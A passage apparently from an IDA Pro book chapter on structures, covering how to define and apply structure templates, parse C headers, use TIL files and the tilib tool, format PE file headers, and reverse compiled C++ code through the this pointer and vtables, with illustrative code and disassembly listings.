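The last hint has a rough analogue in C that may make the idea easier to picture. This is only an illustration under assumptions: the type names are hypothetical, and the 24-byte size and the qword at offset 16 are borrowed from the heap-allocated example. A structure of known size starts as an opaque block of bytes and is refined as fields are discovered, without its size ever changing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CH8_STRUCT_SIZE 24   /* known from the size passed to malloc */

/* Step 1: size known, layout unknown. */
struct ch8_placeholder {
    uint8_t unknown[CH8_STRUCT_SIZE];
};

/* Step 2: a qword field at offset 16 has been observed. */
struct ch8_partial {
    uint8_t unknown_0[16];   /* still unexplored        */
    double  field_10;        /* offset 16 (10h), 8 bytes */
};

/* Aborts if refining the layout changed the overall size. */
static void verify_placeholders(void)
{
    assert(sizeof(struct ch8_placeholder) == CH8_STRUCT_SIZE);
    assert(sizeof(struct ch8_partial) == CH8_STRUCT_SIZE);
    assert(offsetof(struct ch8_partial, field_10) == 16);
}
```

The point of the exercise is the invariant checked by verify_placeholders: each refinement names more bytes, but the total stays fixed at the size you started with.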

Through repeated application of these steps (add field, set field size, add

padding, and so on), you can create an IDA representation of the ch8_struct

(unpacked version), as shown in Figure 8-5.

Figure 8-5: Manually generated definition of the ch8_struct

In this example, padding bytes have been included to achieve proper

field alignment, and fields have been renamed according to the names used

in the preceding examples. Note that the offsets to each field and the overall

size (24 bytes) of the structure match the values seen in the earlier examples.

If you ever feel that a structure definition is taking up too much space in

your Structures window, you can collapse the definition into a one-line sum-

mary by choosing any field within the structure and pressing the minus key

(–) on the numeric keypad. This is useful once a structure has been com-

pletely defined and requires little further editing. The collapsed version of

ch8_struct is shown in Figure 8-6.


The majority of structures that IDA is already aware of will be displayed

in this one-line fashion since it is not expected that they will need to be

edited. The collapsed display provides a reminder that you can use the plus

key (+) on the numeric keypad to expand the definition. Alternatively, dou-

ble-clicking the name of the structure will also expand the definition.

Figure 8-6: A collapsed structure definition

Stack Frames as Specialized Structures

You may notice that structure definitions look somewhat similar to the

detailed stack frame views associated with functions. This is no accident, as

internally IDA treats both identically. Both represent contiguous blocks of

bytes that can be subdivided into named component fields, each associated

with a numeric offset into the structure. The minor difference is that stack

frames utilize both positive and negative field offsets centered on a frame

pointer or return address, while structures use positive offsets from the

beginning of the structure.

Using Structure Templates

There are two ways to make use of structure definitions in your disassemblies.

First, you can reformat memory references to make them more readable by

converting numeric structure offsets such as [ebx+8] into symbolic references

such as [ebx+ch8_struct.field4]. The latter form provides far more informa-

tion about what is being referenced. Because IDA uses a hierarchical nota-

tion, it is clear exactly what type of structure, and exactly which field within

that structure, is being accessed. This technique for applying structure tem-

plates is most often used when a structure is being referenced through a

pointer. The second way to use structure templates is to provide additional

datatypes that can be applied to stack and global variables.

In order to understand how structure definitions can be applied to

instruction operands, it is helpful to view each definition as something similar

to a set of enumerated constants. For example, the definition of ch8_struct

in Figure 8-5 might be expressed in pseudo-C as the following:

enum {

ch8_struct.field1 = 0,

ch8_struct.field2 = 4,

ch8_struct.field3 = 6,


ch8_struct.field4 = 8,

ch8_struct.field5 = 16

};

Given such a definition, IDA allows you to reformat any constant value

used in an operand into an equivalent symbolic representation. Figure 8-7

shows just such an operation in progress. The memory reference [ecx+10h]

may represent an access to field5 within a ch8_struct.

Figure 8-7: Applying a structure offset

The Structure offset option, available by right-clicking 10h in this case,

offers three alternatives for formatting the instruction operand. The alterna-

tives are pulled from the set of structures containing a field whose offset is 16.
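The lookup behind the Structure offset menu can be pictured as a search over known field offsets. The following is a simplified sketch, not IDA's implementation: the table holds only ch8_struct, with the offsets from the enumeration shown earlier, and the names field_def, known_fields, and symbolize_offset are hypothetical. IDA itself would list every known structure that has a field at the requested offset.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct field_def {
    const char *struct_name;
    const char *field_name;
    size_t      offset;
};

/* The only structure this sketch knows about. */
static const struct field_def known_fields[] = {
    { "ch8_struct", "field1", 0  },
    { "ch8_struct", "field2", 4  },
    { "ch8_struct", "field3", 6  },
    { "ch8_struct", "field4", 8  },
    { "ch8_struct", "field5", 16 },
};

/* Write "struct.field" for the first known field at `offset` into buf.
 * Returns 1 if a match was found, 0 otherwise (buf is then empty). */
static int symbolize_offset(size_t offset, char *buf, size_t buflen)
{
    size_t n = sizeof known_fields / sizeof known_fields[0];

    assert(buf != NULL && buflen > 0);
    for (size_t i = 0; i < n; i++) {
        if (known_fields[i].offset == offset) {
            snprintf(buf, buflen, "%s.%s",
                     known_fields[i].struct_name,
                     known_fields[i].field_name);
            return 1;
        }
    }
    buf[0] = '\0';
    return 0;
}
```

Passing 0x10 produces the string ch8_struct.field5, the same name that replaces 10h in the operand, while an offset that matches no field start (5, for instance) produces no candidate at all.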

As an alternative to formatting individual memory references, stack and

global variables can be formatted as entire structures. To format a stack vari-

able as a structure, open the detailed stack frame view by double-clicking the

variable to be formatted as a structure and then use Edit ▶ Struct Var (ALT-Q)

to display a list of known structures similar to that shown in Figure 8-8.

Figure 8-8: The structure selection dialog

Selecting one of the available structures combines the corresponding

number of bytes in the stack into the corresponding structure type and refor-

mats all related memory references as structure references. The following


code is an excerpt from the stack-allocated structure example we examined

previously:

.text:00401006 mov [ebp+var_18], 10

.text:0040100D mov [ebp+var_14], 20

.text:00401013 mov [ebp+var_12], 30

.text:00401017 mov [ebp+var_10], 40

.text:0040101E fld ds:dbl_40B128

.text:00401024 fstp [ebp+var_8]

Recall that we concluded that var_18 is actually the first field in a 24-byte

structure. The detailed stack frame for this particular interpretation is shown

in Figure 8-9.

Figure 8-9: Stack allocated structure prior to formatting

Selecting var_18 and formatting it as a ch8_struct (Edit ▶ Struct Var) collapses

the 24 bytes (the size of ch8_struct) beginning at var_18 into a single

variable, resulting in the reformatted stack display shown in Figure 8-10. In

this case, applying the structure template to var_18 will generate a warning

message indicating that some variables will be destroyed in the process of

converting var_18 into a structure. Based on our earlier analysis, this is to be

expected, so we simply acknowledge the warning to complete the operation.

Figure 8-10: Stack allocated structure after formatting


Following reformatting, IDA understands that any memory reference

into the 24-byte block allocated to var_18 must refer to a field within the

structure. When IDA encounters such a reference, it makes every effort to

resolve the memory reference to one of the defined fields within the struc-

ture variable. In this case, the disassembly is automatically reformatted to

incorporate the structure layout, as shown here:

.text:00401006 mov [ebp+var_18.field1], 10

.text:0040100D mov [ebp+var_18.field2], 20

.text:00401013 mov [ebp+var_18.field3], 30

.text:00401017 mov [ebp+var_18.field4], 40

.text:0040101E fld ds:dbl_40B128

.text:00401024 fstp [ebp+var_18.field5]

The advantage to using structure notation within the disassembly is an

overall improvement in the readability of the disassembly. The use of field

names in the reformatted display provides a much more accurate reflection

of how data was actually manipulated in the original source code.

The procedure for formatting global variables as structures is nearly

identical to that used for stack variables. To do so, select the variable or

address that marks the beginning of the structure and use Edit ▶ Struct Var

(ALT-Q) to choose the appropriate structure type. As an alternative for unde-

fined global data only (not stack data), you may use IDA’s context-sensitive

menu, and select the structure option to view and select an available struc-

ture template to apply at the selected address.

Importing New Structures

After working with IDA’s structure-creation and editing features for a while,

you may find yourself longing for an easier way to do things. Fortunately,

IDA does offer some shortcuts concerning new structures. IDA is capable of

parsing individual C (not C++) data declarations, as well as entire C header

files, and automatically building IDA structure representations for any struc-

tures defined in those declarations or header files. If you happen to have the

source code, or at least the header files, for the binary that you are reversing,

then you can save a lot of time by having IDA extract related structures

directly from the source code.

Parsing C Structure Declarations

A Local Types subview window is available by using the View ▶

Open Subviews ▶ Local Types command. The Local Types window displays

a list of all types that have been parsed into the current database. For new

databases, the Local Types window is initially empty, but the window offers

the capability to parse new types via the INSERT key or the Insert option from

the context menu. The resulting type entry dialog is shown in Figure 8-11.


Figure 8-11: The Local Types entry dialog

Errors encountered while parsing the new type are displayed in the IDA

output window. If the type declaration is successfully parsed, the type and its

associated declaration are listed in the Local Types window, as shown in Fig-

ure 8-12.

Figure 8-12: The Local Types window

Note that the IDA parser utilizes a default structure member alignment

of 4 bytes. If your structure requires a different alignment, include a

pragma pack directive with the declaration; IDA recognizes the directive and

applies the requested member alignment.
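The effect of a 4-byte member alignment on the chapter's example structure is worth checking before trusting a parsed declaration. The sketch below assumes that the parser's 4-byte default behaves like pragma pack(4) in a typical C compiler, which has not been verified against IDA here; the type name ch8_struct_pack4 and the helper verify_pack4_layout are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#pragma pack(push, 4)            /* mimic a 4-byte default member alignment */
struct ch8_struct_pack4 {
    int32_t field1;              /* offset 0            */
    int16_t field2;              /* offset 4            */
    int8_t  field3;              /* offset 6            */
    int32_t field4;              /* offset 8            */
    double  field5;              /* offset 12, not 16   */
};
#pragma pack(pop)

/* Aborts if the compiler lays the structure out differently. */
static void verify_pack4_layout(void)
{
    assert(offsetof(struct ch8_struct_pack4, field4) == 8);
    assert(offsetof(struct ch8_struct_pack4, field5) == 12);
    assert(sizeof(struct ch8_struct_pack4) == 20);
}
```

Under that assumption the double moves from offset 16 to offset 12 and the structure shrinks from 24 to 20 bytes, so it no longer matches the default-alignment disassembly. Whatever alignment you choose, compare the resulting offsets against the operands you actually observed.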

Datatypes added to the Local Types window are not immediately available

via the Structures window. There are two methods for adding local type

declarations to the Structures window. The easiest method is to right-click

the desired local type and select Synchronize to idb. Alternatively, because

each new type is also added to the list of standard structures, the new type

may be imported into the Structures window as described in “Using Standard

Structures” on page 151.

Parsing C Header Files

To parse a header file, use FileLoad FileParse C Header File to choose

the header you wish to parse. If all goes well, IDA returns the message:

Compilation successful. If the parser encounters any problems, you are noti-

fied that there were errors. Any associated error messages are displayed in

the IDA output window.

IDA adds all structures that were successfully parsed to both the list of

local types and the list of standard structures (to the end of the list to be

exact) available in the current database. When a new structure has the same

name as an existing structure, the existing structure definition is overwritten


with the new structure layout. None of the new structures appear in the

Structures window until you elect to explicitly add them, as described above

for local types or in “Using Standard Structures” on page 151.

When parsing C header files, it is useful to keep the following points

in mind:

• The built-in parser does not necessarily use the same default structure

member alignment as your compiler, though it does honor the pack

pragma. By default, the parser creates structures that are 4-byte aligned.

• The parser understands the C preprocessor include directive. To resolve

include directives, the parser searches the directory containing the file

being parsed as well as any directories listed as Include directories in the

Options ▶ Compiler configuration dialog.

• The parser understands only C standard datatypes. However, the parser

also understands the preprocessor define directive as well as the C typedef

statement. Thus, types such as uint32_t will be correctly parsed if the

parser has encountered an appropriate typedef prior to their use.

• When you don’t have any source code, you may find it easier to quickly

define a structure layout in C notation using a text editor and parse the

resulting header file or paste the declaration as a new local type, rather

than using IDA’s cumbersome manual structure-definition tools.

• New structures are available only in the current database. You must

repeat the structure-creation steps in each additional database for

which you wish to use the structures. We will discuss some steps for

simplifying this process when we discuss TIL files later in the chapter.

In general, to maximize your chances of successfully parsing a header

file, you will want to simplify your structure definitions as much as possible

through the use of standard C datatypes and minimizing the use of include

files. Remember, the most important thing about creating structures in IDA

is to ensure that the layout is correct. Correct layout depends far more on the

correct size of each field and the correct alignment of the structure than get-

ting the exact type of each field just right. In other words, if you need to

replace all occurrences of uint32_t with int in order to get a file to parse cor-

rectly, you should go right ahead and do it.

Using Standard Structures

As mentioned previously, IDA recognizes a tremendous number of data

structures associated with various library and API functions. When a database

is initially created, IDA attempts to determine the compiler and platform

associated with the binary and loads the structure templates derived from

related library header files. As IDA encounters actual structure manipula-

tions in the disassembly, it adds the appropriate structure definitions to the

Structures window. Thus, the Structures window represents the subset of

known structures that happen to apply to the current binary. In addition to


creating your own custom structures, you can add additional standard struc-

tures to the Structures window by drawing from IDA’s list of known structure

types.

The process for adding a new structure begins by pressing the INSERT key

inside the Structures window. Figure 8-3 showed the Create Structure/Union

dialog, one component of which is the Add standard structure button. Click-

ing this button grants access to the master list of structures pertaining to the

current compiler (as detected during the analysis phase) and file format.

This master list of structures also contains any structures that have been

added to the database as a result of parsing C header files. The structure

selection dialog shown in Figure 8-13 is used to choose a structure to add

to the Structures window.

Figure 8-13: Standard structure selection

You may utilize the search functionality to locate structures based on a

partial text match. The dialog also allows for prefix matching. If you know

the first few characters of the structure name, simply type them in (they will

appear in the status bar at the bottom of the dialog), and the list display will

jump to the first structure with a matching prefix. Choosing a structure adds

the structure and any nested structures to the Structures window.

As an example of using standard structures, consider a case in which you

wish to examine the file headers associated with a Windows PE binary. By

default, the file headers are not loaded into the database when it is first cre-

ated; however, file headers can be loaded if you select the Manual load

option during initial database creation. Loading the file headers ensures

only that the data bytes associated with those headers will be present in the

database. In most cases, the headers will not be formatted in any way because

typical programs make no direct reference to their own file headers. Thus

there is no reason for the analyzer to apply structure templates to the headers.

After conducting some research on the format of a PE binary, you

will learn that a PE file begins with an MS-DOS header structure named

IMAGE_DOS_HEADER. Further, data contained within the IMAGE_DOS_HEADER

points to the location of an IMAGE_NT_HEADERS structure, which details the

memory layout of the PE binary. Choosing to load the PE headers, you

might see something similar to the following unformatted data disassem-

bly. Readers familiar with the PE file structure may recognize the familiar

MS-DOS magic value MZ as the first two bytes in the file.


HEADER:00400000 __ImageBase db 4Dh ; M

HEADER:00400001 db 5Ah ; Z

HEADER:00400002 db 90h ; É

HEADER:00400003 db 0

HEADER:00400004 db 3

HEADER:00400005 db 0

HEADER:00400006 db 0

HEADER:00400007 db 0

HEADER:00400008 db 4

HEADER:00400009 db 0

HEADER:0040000A db 0

HEADER:0040000B db 0

HEADER:0040000C db 0FFh

HEADER:0040000D db 0FFh

HEADER:0040000E db 0

HEADER:0040000F db 0

As this file is formatted here, you would need some PE file reference doc-

umentation to help you make sense of each of the data bytes. By using struc-

ture templates, IDA can format these bytes as an IMAGE_DOS_HEADER, making the

data far more useful. The first step is to add the standard IMAGE_DOS_HEADER as

detailed above (you could add the IMAGE_NT_HEADERS structure while you are at

it). The second step is to convert the bytes beginning at __ImageBase into an

IMAGE_DOS_HEADER structure using EditStruct Var (ALT-Q). This results in the

reformatted display shown here:

HEADER:00400000 __ImageBase IMAGE_DOS_HEADER <5A4Dh, 90h, 3, 0, 4, 0, 0FFFFh, 0, 0B8h, \

HEADER:00400000 0, 0, 0, 40h, 0, 0, 0, 0, 0, 80h>

HEADER:00400040 db 0Eh

As you can see, the first 64 (0x40) bytes in the file have been collapsed

into a single data structure, with the type noted in the disassembly. Unless

you possess encyclopedic knowledge of this particular structure, though,

the meaning of each field may remain somewhat cryptic. We can take this

operation one step further, however, by expanding the structure. When a

structured data item is expanded, each field is annotated with its corre-

sponding field name from the structure definition. Collapsed structures

can be expanded using the plus key (+) on the numeric keypad. The final

version of the listing follows:

HEADER:00400000 __ImageBase dw 5A4Dh ; e_magic

HEADER:00400000 dw 90h ; e_cblp

HEADER:00400000 dw 3 ; e_cp

HEADER:00400000 dw 0 ; e_crlc

HEADER:00400000 dw 4 ; e_cparhdr

HEADER:00400000 dw 0 ; e_minalloc

HEADER:00400000 dw 0FFFFh ; e_maxalloc

HEADER:00400000 dw 0 ; e_ss

HEADER:00400000 dw 0B8h ; e_sp

HEADER:00400000 dw 0 ; e_csum

HEADER:00400000 dw 0 ; e_ip

HEADER:00400000 dw 0 ; e_cs

HEADER:00400000 dw 40h ; e_lfarlc

HEADER:00400000 dw 0 ; e_ovno

HEADER:00400000 dw 4 dup(0) ; e_res

HEADER:00400000 dw 0 ; e_oemid

HEADER:00400000 dw 0 ; e_oeminfo

HEADER:00400000 dw 0Ah dup(0) ; e_res2

HEADER:00400000 dd 80h ; e_lfanew [X]

HEADER:00400040 db 0Eh

Unfortunately, the fields of IMAGE_DOS_HEADER do not possess particularly
meaningful names, so we may need to consult a PE file reference to remind
ourselves that the e_lfanew field (marked X) indicates the file offset at which an
IMAGE_NT_HEADERS structure can be found. Applying all of the previous steps
to create an IMAGE_NT_HEADERS structure at address 00400080 (0x80 bytes into
the database) yields the nicely formatted structure shown in part here:

HEADER:00400080 dd 4550h ; Signature

HEADER:00400080 dw 14Ch ; FileHeader.Machine

HEADER:00400080 dw 5 ; FileHeader.NumberOfSections [X]

HEADER:00400080 dd 4789ADF1h ; FileHeader.TimeDateStamp

HEADER:00400080 dd 1400h ; FileHeader.PointerToSymbolTable

HEADER:00400080 dd 14Eh ; FileHeader.NumberOfSymbols

HEADER:00400080 dw 0E0h ; FileHeader.SizeOfOptionalHeader

HEADER:00400080 dw 307h ; FileHeader.Characteristics

HEADER:00400080 dw 10Bh ; OptionalHeader.Magic

HEADER:00400080 db 2 ; OptionalHeader.MajorLinkerVersion

HEADER:00400080 db 38h ; OptionalHeader.MinorLinkerVersion

HEADER:00400080 dd 800h ; OptionalHeader.SizeOfCode

HEADER:00400080 dd 800h ; OptionalHeader.SizeOfInitializedData

HEADER:00400080 dd 200h ; OptionalHeader.SizeOfUninitializedData

HEADER:00400080 dd 1000h ; OptionalHeader.AddressOfEntryPoint

HEADER:00400080 dd 1000h ; OptionalHeader.BaseOfCode

HEADER:00400080 dd 2000h ; OptionalHeader.BaseOfData

HEADER:00400080 dd 400000h ; OptionalHeader.ImageBase [Y]

Fortunately for us, the field names in this case are somewhat more meaningful. We quickly see that the file consists of five sections (X) and should be loaded into memory at virtual address 00400000 (Y). Expanded structures can

be returned to their collapsed state using the minus key (–) on the keypad.
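The same header walk can be sketched outside of IDA. The following is a minimal illustration, not part of IDA or any Windows API: the helper names (read_le, write_le, make_sample_headers, summarize) and the PeSummary type are hypothetical, and the sample buffer fills in only the fields discussed above, using the values from the listings. The offsets used (e_lfanew at 0x3C, NumberOfSections at 6 bytes and ImageBase at 0x34 bytes past the PE signature) assume a 32-bit PE image such as the one shown.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Read a little-endian value of 'width' bytes (at most 4) one byte at a time,
// so the sketch does not depend on host endianness or structure packing.
std::uint32_t read_le(const std::vector<std::uint8_t>& buf, std::size_t off, std::size_t width) {
    assert(width <= 4 && off + width <= buf.size());
    std::uint32_t value = 0;
    for (std::size_t i = 0; i < width; ++i)
        value |= static_cast<std::uint32_t>(buf[off + i]) << (8 * i);
    return value;
}

// Store a little-endian value of 'width' bytes (at most 4).
void write_le(std::vector<std::uint8_t>& buf, std::size_t off, std::uint32_t value, std::size_t width) {
    assert(width <= 4 && off + width <= buf.size());
    for (std::size_t i = 0; i < width; ++i)
        buf[off + i] = static_cast<std::uint8_t>((value >> (8 * i)) & 0xFF);
}

// Hypothetical sample: only the fields discussed in the text are populated.
std::vector<std::uint8_t> make_sample_headers() {
    std::vector<std::uint8_t> img(0x80 + 0x38, 0);
    write_le(img, 0x00, 0x5A4D, 2);            // e_magic, "MZ"
    write_le(img, 0x3C, 0x80, 4);              // e_lfanew
    write_le(img, 0x80 + 0x00, 0x4550, 4);     // Signature, "PE\0\0"
    write_le(img, 0x80 + 0x06, 5, 2);          // FileHeader.NumberOfSections
    write_le(img, 0x80 + 0x34, 0x400000, 4);   // OptionalHeader.ImageBase
    return img;
}

struct PeSummary {
    bool valid;
    std::uint16_t sections;
    std::uint32_t image_base;
};

// Follow e_lfanew from the DOS header to the NT headers and pull out two fields.
PeSummary summarize(const std::vector<std::uint8_t>& img) {
    PeSummary out = {false, 0, 0};
    if (img.size() < 0x40 || read_le(img, 0x00, 2) != 0x5A4D) return out;  // no MZ magic
    const std::uint32_t nt = read_le(img, 0x3C, 4);                         // e_lfanew
    if (nt > img.size() || img.size() - nt < 0x38) return out;              // headers truncated
    if (read_le(img, nt, 4) != 0x4550) return out;                          // no PE signature
    out.valid = true;
    out.sections = static_cast<std::uint16_t>(read_le(img, nt + 0x06, 2));
    out.image_base = read_le(img, nt + 0x34, 4);
    return out;
}
```

Calling summarize(make_sample_headers()) reports five sections and an image base of 0x400000, matching the fields marked in the expanded IMAGE_NT_HEADERS listing.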

IDA TIL Files

All datatype and function prototype information in IDA is stored in TIL files.

IDA ships with type library information for many major compilers and APIs

stored in the <IDADIR>/til directory. The Types window (View ▸ Open Subviews ▸ Type Libraries) lists currently loaded .til files and is used to load additional .til files that you may wish to use. Type libraries are loaded automatically

based on attributes of the binary discovered during the analysis phase. Under

ideal circumstances, most users will never need to deal with .til files directly.

Loading New TIL Files

In some cases, IDA may fail to detect that a specific compiler was used to

build a binary, perhaps because the binary has undergone some form of

obfuscation. When this happens, you may load additional .til files by pressing

the INSERT key within the Types window and selecting the desired .til files.

When a new .til file is loaded, all structure definitions contained in the file

are added to the list of standard structures, and type information is applied

for any functions within the binary that have matching prototypes in the

newly loaded .til file. In other words, when IDA gains new knowledge about

the nature of a function, it automatically applies that new knowledge.

Sharing TIL Files

IDA also makes use of .til files to store any custom structure definitions that

you create manually in the Structures window or through parsing C header

files. Such structures are stored in a dedicated .til file associated with the data-

base in which they were created. This file shares the base name of the database

and has a .til extension. For a database named some_file.idb, the associated type

library file would be some_file.til. Under normal circumstances you will never

see this file unless you happen to have the database open in IDA. Recall that

an .idb file is actually an archive file (similar to a .tar file) used to hold the com-

ponents of a database when they are not in use. When a database is opened,

the component files (the .til file being one of them) are extracted as working

files for IDA.

A discussion regarding how to share .til files across databases can be

found at http://www.hex-rays.com/forum/viewtopic.php?f=6&t=986.⁴ Two techniques are mentioned. The first technique is somewhat unofficial and involves

copying the .til file from an open database into your IDA til directory from

which it can be opened, in any other database, via the Types window. A more

official way to extract the custom type information from a database is to gen-

erate an IDC script that can be used to re-create the custom structures in any

other database. Such a script can be generated using the File ▸ Produce File ▸ Dump Typeinfo to IDC File command. However, unlike the first technique,

this technique dumps only the structures listed in the Structures window,

which may not include all structures parsed from C header files (whereas the

.til file-copying technique will).

Hex-Rays also provides a standalone tool, named tilib, for creating .til

files outside of IDA. The utility is available as a .zip file for registered users via

the Hex-Rays IDA download page. Installation is as simple as extracting the

.zip file contents into <IDADIR>. The tilib utility may be used to list the con-

tents of existing .til files or create new .til files by parsing C (not C++) header

files. The following command would list the contents of the Visual Studio 6

type library:

C:\Program Files\IdaPro>tilib -l til\pc\vc6win.til

4. This link is accessible to registered users only.

Creating a new .til file involves naming the header file to be parsed and

the .til file to be created. Command line options allow you to specify addi-

tional include file directories or, alternatively, previously parsed .til files in

order to resolve any dependencies contained in your header file. The follow-

ing command creates a new .til file containing the declaration of ch8_struct.

The resulting .til file must be moved into <IDADIR>/til before IDA can make

use of it.

C:\Program Files\IdaPro>tilib -c -hch8_struct.h ch8.til

The tilib utility contains a substantial number of additional capabilities,

some of which are detailed in the README file included with the tilib distribution, and others of which are briefly detailed by running tilib with no arguments. Prior to version 6.1, tilib was distributed only as a Windows executable;

however, the .til files that it generates are compatible with all versions of IDA.

C++ Reversing Primer

C++ classes are the object-oriented extensions of C structs, so it is somewhat

logical to wrap up our discussion of data structures with a review of the fea-

tures of compiled C++ code. C++ is sufficiently complex that detailed cover-

age of the topic is beyond the scope of this book. Here we attempt to cover

the highlights and a few of the differences between Microsoft’s Visual C++

and GNU’s g++.

An important point to remember is that a solid, fundamental under-

standing of the C++ language will assist you greatly in understanding com-

piled C++. Object-oriented concepts such as inheritance and polymorphism

are difficult enough to learn well at the source level. Attempting to dive into

these concepts at the assembly level without understanding them at the

source level will certainly be an exercise in frustration.

The this Pointer

The this pointer is a pointer available in all nonstatic C++ member functions.

Whenever such a function is called, this is initialized to point to the object

used to invoke the function. Consider the following function calls:

//object1, object2, and *p_obj are all the same type.

object1.member_func();

object2.member_func();

p_obj->member_func();

In the three calls to member_func, this takes on the values &object1,

&object2, and p_obj, respectively. It is easiest to view this as a hidden first

parameter passed in to all nonstatic member functions. As discussed in Chap-

ter 6, Microsoft Visual C++ utilizes the thiscall calling convention and passes

this in the ECX register. The GNU g++ compiler treats this exactly as if it were the first (leftmost) parameter to nonstatic member functions and pushes the

address of the object used to invoke the function as the topmost item on the

stack prior to calling the function.
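One way to picture the hidden parameter is to write the same operation twice: once as a member function and once as a free function that receives the object's address explicitly. The sketch below is illustrative only; Counter and Counter_add are hypothetical names, and the free function merely models what the compiler arranges behind the scenes rather than reproducing any particular calling convention.

```cpp
#include <cassert>

struct Counter {
    int value;
    // Nonstatic member function: 'value' is really 'this->value'.
    int add(int n) { value += n; return value; }
};

// Free-function model of the same operation. 'self' plays the role of the
// hidden this parameter (passed in ECX by Visual C++, or as the first stack
// argument by g++ on 32-bit x86).
int Counter_add(Counter* self, int n) {
    assert(self != nullptr);
    self->value += n;
    return self->value;
}
```

Given Counter c{1}, the calls c.add(2) and Counter_add(&c, 2) update the same field in the same way; only the manner in which the object's address reaches the function differs.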

From a reverse engineering point of view, the moving of an address into

the ECX register immediately prior to a function call is a probable indicator

of two things. First, the file was compiled using Visual C++. Second, the func-

tion is a member function. When the same address is passed to two or more

functions, we can conclude that those functions all belong to the same class

hierarchy.

Within a function, the use of ECX prior to initializing it implies that the

caller must have initialized ECX and is a possible sign that the function is a

member function (though the function may simply use the fastcall calling

convention). Further, when a member function is observed to pass this to

additional functions, those functions can be inferred to be members of the

same class as well.

For code compiled using g++, calls to member functions stand out some-

what less. However, any function that does not take a pointer as its first argu-

ment can certainly be ruled out as a member function.

Virtual Functions and Vtables

Virtual functions provide the means for polymorphic behavior in C++ pro-

grams. For each class (or subclass through inheritance) that contains virtual

functions, the compiler generates a table containing pointers to each virtual

function in the class. Such tables are called vtables. Furthermore, every class

that contains virtual functions is given an additional data member whose pur-

pose is to point to the appropriate vtable at runtime. This member is typically

referred to as a vtable pointer and is allocated as the first data member within

the class. When an object is created at runtime, its vtable pointer is set to

point at the appropriate vtable. When that object invokes a virtual function,

the correct function is selected by performing a lookup in the object’s vtable.

Thus, vtables are the underlying mechanism that facilitates runtime resolu-

tion of calls to virtual functions.

A few examples may help to clarify the use of vtables. Consider the fol-

lowing C++ class definitions:

class BaseClass {

public:

BaseClass();

virtual void vfunc1() = 0;

virtual void vfunc2();

virtual void vfunc3();

virtual void vfunc4();

private:

int x;

int y;

};

class SubClass : public BaseClass {

public:

SubClass();

virtual void vfunc1();

virtual void vfunc3();

virtual void vfunc5();

private:

int z;

};

In this case, SubClass inherits from BaseClass. BaseClass contains four vir-

tual functions, while SubClass contains five (four from BaseClass plus the new

vfunc5). Within BaseClass, vfunc1 is a pure virtual function by virtue of the use of

=0 in its declaration. Pure virtual functions have no implementation in their

declaring class and must be overridden in a subclass before the class is consid-

ered concrete. In other words, there is no function named BaseClass::vfunc1,

and until a subclass provides an implementation, no objects can be instanti-

ated. SubClass provides such an implementation, so SubClass objects can be

created.

At first glance BaseClass appears to contain two data members and Sub-

Class three data members. Recall, however, that any class that contains virtual

functions, either explicitly or because they are inherited, also contains a vtable

pointer. As a result, instantiated BaseClass objects actually have three data

members, while instantiated SubClass objects have four data members. In

each case, the first data member is the vtable pointer. Within SubClass, the

vtable pointer is actually inherited from BaseClass rather than being intro-

duced specifically for SubClass. Figure 8-14 shows a simplified memory layout

in which a single SubClass object has been dynamically allocated. During the

creation of the object, the compiler ensures that the new object’s vtable

pointer points to the correct vtable (SubClass’s in this case).

Figure 8-14: A simple vtable layout

BaseClass *bc = new SubClass();

heap data: the SubClass object, whose first field (p_vftable) points to the SubClass vtable
read-only data (.rdata/.rodata):
BaseClass vtable: &purecall, &BaseClass::vfunc2, &BaseClass::vfunc3, &BaseClass::vfunc4
SubClass vtable: &SubClass::vfunc1, &BaseClass::vfunc2, &SubClass::vfunc3, &BaseClass::vfunc4, &SubClass::vfunc5

Note that the vtable for SubClass contains two pointers to functions

belonging to BaseClass (BaseClass::vfunc2 and BaseClass::vfunc4). This is

because SubClass does not override either of these functions and instead

inherits them from BaseClass. Also shown is the typical handling of pure vir-

tual function entries. Because there is no implementation for the pure virtual

function BaseClass::vfunc1, no address is available to store in the BaseClass

vtable slot for vfunc1. In such cases, compilers insert the address of an error-

handling function, often dubbed purecall, which in theory should never be

called but which will usually abort the program in the event that it somehow

is called.

One consequence of the presence of a vtable pointer is that you must

account for it when you manipulate the class within IDA. Recall that C++

classes are an extension of C structures. Therefore, you may choose to make

use of IDA’s structure definition features to define the layout of C++ classes.

In the case of classes that contain virtual functions, you must remember to

include a vtable pointer as the first field within the class. Vtable pointers

must also be accounted for in the total size of an object. This is most apparent when observing the dynamic allocation of an object using the new⁵ operator, where the size value passed to new includes the space consumed by all

explicitly declared fields in the class (and any superclasses) as well as any

space required for a vtable pointer.
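The extra space can be observed directly with sizeof. The following sketch compares two hypothetical types, PlainPair and VirtualPair, that declare the same two int fields; only the second has virtual functions. The exact sizes are implementation details that vary with compiler and pointer width, so treat the result as typical of Visual C++ and g++ rather than as something the language guarantees.

```cpp
#include <cassert>
#include <cstddef>

// Two declared fields, no virtual functions: no vtable pointer is needed.
struct PlainPair {
    int x;
    int y;
};

// Same declared fields plus virtual functions: mainstream compilers add a
// hidden vtable pointer as the first member.
struct VirtualPair {
    virtual ~VirtualPair() {}
    virtual void vfunc() {}
    int x;
    int y;
};

// Number of bytes VirtualPair occupies beyond its declared fields.
std::size_t hidden_bytes() {
    assert(sizeof(VirtualPair) >= sizeof(PlainPair));
    return sizeof(VirtualPair) - sizeof(PlainPair);
}
```

On common 32-bit targets hidden_bytes() is typically 4, which is why a class with fields x, y, and z plus virtual functions shows up as a 16-byte allocation in calls to new.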

In the following example a SubClass object is created dynamically, and

its address saved in a BaseClass pointer. The pointer is then passed to a func-

tion (call_vfunc), which uses the pointer to call vfunc3.

void call_vfunc(BaseClass *b) {

b->vfunc3();

}

int main() {

BaseClass *bc = new SubClass();

call_vfunc(bc);

}

Since vfunc3 is a virtual function, the compiler must ensure that

SubClass::vfunc3 is called in this case because the pointer points to a Sub-

Class object. The following disassembled version of call_vfunc demonstrates

how the virtual function call is resolved:

.text:004010A0 call_vfunc proc near
.text:004010A0
.text:004010A0 b = dword ptr 8
.text:004010A0
.text:004010A0 push ebp
.text:004010A1 mov ebp, esp
.text:004010A3 mov eax, [ebp+b]
.text:004010A6 mov edx, [eax] ; [X]
.text:004010A8 mov ecx, [ebp+b]
.text:004010AB mov eax, [edx+8] ; [Y]
